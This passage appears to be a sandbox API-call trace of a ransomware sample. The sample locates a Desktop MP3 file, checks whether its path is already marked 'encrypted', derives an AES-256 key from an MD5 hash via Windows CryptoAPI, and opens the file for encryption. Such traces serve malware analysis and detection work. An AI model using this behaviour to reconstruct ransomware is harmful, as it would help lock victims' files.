FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0xdf97b070, ftLastWriteTime.dwHighDateTime=0x1d5c46c, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0x7c20c0 [0030.465] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.465] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TLkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lkm8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="km8G.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.466] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.466] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.466] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.466] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.466] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.466] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6c11b0, ftCreationTime.dwHighDateTime=0x1d5c0d9, ftLastAccessTime.dwLowDateTime=0xdf97b070, ftLastAccessTime.dwHighDateTime=0x1d5c46c, ftLastWriteTime.dwLowDateTime=0xdf97b070, ftLastWriteTime.dwHighDateTime=0x1d5c46c, nFileSizeHigh=0x0, nFileSizeLow=0x165c8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="TLkm8G.mp3", cAlternateFileName="")) returned 0x7c2240 [0030.467] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.467] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.467] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.468] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.468] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0030.468] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.468] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.468] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.469] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.469] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.469] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.469] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.470] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.470] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.470] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.470] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.470] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.470] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.470] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.471] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.471] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.471] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.471] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.471] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TLkm8G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tlkm8g.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.471] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.471] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.472] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 